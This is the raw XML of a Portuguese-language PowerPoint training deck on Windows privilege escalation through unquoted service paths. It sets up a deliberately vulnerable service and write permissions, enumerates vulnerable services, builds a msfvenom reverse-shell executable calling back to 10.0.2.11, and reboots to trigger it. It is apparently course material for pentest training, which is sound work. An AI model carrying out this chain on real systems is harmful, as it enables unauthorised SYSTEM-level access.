              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>ataque</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> unquoted path e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>explorem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ele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através</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>metrepreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Pra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isso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vcs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precisarão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pensar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> fora da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>caixa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>combinar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algumas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técnicas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>já</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>aprendemos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>curso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Enviem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> pela </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>platafroma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> um screenshot </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="416887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901694"/>
            <a:ext cx="12056881" cy="23876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Windows Privilege Escalation</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>Escalonamento</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>privilégios</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>em</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t> ambientes Windows)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26694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Privilege </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>Escalation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> é o processo de elevação de privilégios limitados a um nível mais alto de acesso e habilidades.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2696" y="1171757"/>
            <a:ext cx="2772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 que é </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Privilege Escalation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432819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Privilege Escalation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>é um procedimento obrigatório em cada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>Pentest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> ou operação de segurança</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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86801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Privilege Escalation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>é uma habilidade que leva tempo para adquirir.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303209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Privilege Escalation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>é baseado na enumeração. Contanto que sua enumeração seja boa, você pode encontrar potenciais fontes de PE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526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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>principais</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>métodos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> de Privilege Escalation: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549" y="1173071"/>
            <a:ext cx="2772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 que é </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Privilege Escalation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595155" y="2778034"/>
            <a:ext cx="2717074" cy="99277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Misconfiguration PE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44144" y="2778034"/>
            <a:ext cx="2717074" cy="992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Kernel PE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95155" y="4501053"/>
            <a:ext cx="2717074" cy="4659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Local Exploits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20072" y="4505520"/>
            <a:ext cx="2717074" cy="4659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Remote Exploits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06636" y="5587216"/>
            <a:ext cx="1894112" cy="3156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User Interaction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96000" y="5587216"/>
            <a:ext cx="2565218" cy="3156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Without User Interaction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="182293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Quando um serviço é criado cujo caminho executável contém espaços e não está entre aspas.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1632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432819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Pode levar a uma vulnerabilidade conhecida como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1"/>
              <a:t>Unquoted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t> Path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>, que permite ao usuário obter privilégios de SYSTEM.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86801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Se o serviço não estiver entre aspas e tiver espaços, ele tratará o espaço como uma quebra e passará o resto do caminho do serviço como um argumento.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2424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 que é Unquoted Path</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="304657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Temos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>seguinte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>caminho</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (path): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>C:\Program Files\First Subfolder\Second Subfolder\Third Subfolder\Executable.exe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1632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995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Exemplo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37427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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rodar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Executable.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sistema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>interpretará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path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seguinte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ordem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/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2123" y="2800016"/>
            <a:ext cx="2518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/>
              <a:t>C:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Program</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>.exe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123" y="3309803"/>
            <a:ext cx="3799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2. C:\Program Files\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>First</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>.exe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23" y="3819590"/>
            <a:ext cx="616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3. C:\Program Files\First Subfolder\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Second</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>.exe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775" y="4281255"/>
            <a:ext cx="8243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4. C:\Program Files\First Subfolder\Second subfolder\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Third</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>.exe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123" y="4749929"/>
            <a:ext cx="11055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5. C:\Program Files\First Subfolder\Second subfolder\Third subfolder\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Executable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>.exe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="409989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3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Temos as permissões de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t>gravação</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> no contexto do usuário com quem estamos trabalhando no momento.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1632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2624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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Processo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Exploração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37427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Nós, como invasores, podemos deixar nosso executável malicioso nessa pasta para obter um </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> reverso.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2743606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Precisamos enumerar um serviço que é vulnerável e também enumerar permissões de gravação na pasta.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0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sc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> create "Vulnerable Service" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>binpath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>= "C:\Program Files\A Subfolder\B Subfolder\C Subfolder\Executable.exe" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Displayname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>= "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Service" start= auto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666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 – Environment setup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Crinado</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> Service: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2" y="2962167"/>
            <a:ext cx="147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Criando</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> Path: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319227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mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> "C:\Program Files\A Subfolder\B Subfolder\C Subfolder"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22" y="4029867"/>
            <a:ext cx="331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Criando</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Permissões</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>gravação</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>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4399199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icacls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> "C:\Program Files\A Subfolder" /grant "BUILTIN\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Users":W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90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Windows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938267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wmic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> service get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>name,pathname,displayname,startmode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>findstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> auto | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>findstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /v "C:\Windows\\" | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>findstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /v """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108082"/>
            <a:ext cx="3003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Unquoted Path – Exploitation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123" y="1635610"/>
            <a:ext cx="1482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Enumeration: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2" y="2515420"/>
            <a:ext cx="342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Testando</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Permissões</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>gravação</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>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872480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icacls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> "C:\Program Files\A Subfolder"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2122" y="3449633"/>
            <a:ext cx="1799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Criando</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> Payload: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3818965"/>
            <a:ext cx="1188828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err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -p windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>shell_reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> LHOST=10.0.2.11 LPORT=4443 -f exe -o B.exe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122" y="4438897"/>
            <a:ext cx="2984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Testando</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> o status do service: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4808229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sc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> qc "Vulnerable Service"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2122" y="5428161"/>
            <a:ext cx="2153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Restart remote host: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5797493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shutdown /r /t 0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9457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56E03BE3544194A9711D8E727977D0B" ma:contentTypeVersion="9" ma:contentTypeDescription="Crie um novo documento." ma:contentTypeScope="" ma:versionID="22ff5d0a66fe176ebb507ab62aa1c3de">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="0de1bb88-64f6-4f17-8933-73fd235044ff" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="a8df32aad410ccae5763d30ffd13a2a2" ns2:_="">
    <xsd:import namespace="0de1bb88-64f6-4f17-8933-73fd23504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e1bb88-64f6-4f17-8933-73fd235044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B71337-A9DB-4219-A187-94EF1E7A2E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e1bb88-64f6-4f17-8933-73fd235044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9DA581-2345-4B78-AF93-5FB429B80D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2BC9F2-673E-4A21-A8F1-36EFD62C4F9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16818</TotalTime>
  <Words>1132</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>111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1_Office Theme</vt:lpstr>
      <vt:lpstr>2_Office Theme</vt:lpstr>
      <vt:lpstr>Personalizar design</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Windows Privilege Escalation (Escalonamento de privilégios em ambientes Windows)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Windows Privilege Escalation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Exploits And Metasploit</dc:title>
  <dc:creator>shai</dc:creator>
  <cp:lastModifiedBy>ישראל מאיר רוזנברג</cp:lastModifiedBy>
  <cp:revision>100</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-11-26T08:36:16Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-12-03T11:21:08Z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0x010100D56E03BE3544194A9711D8E727977D0B</vt:lpwstr>
  </property>
</Properties>
</file>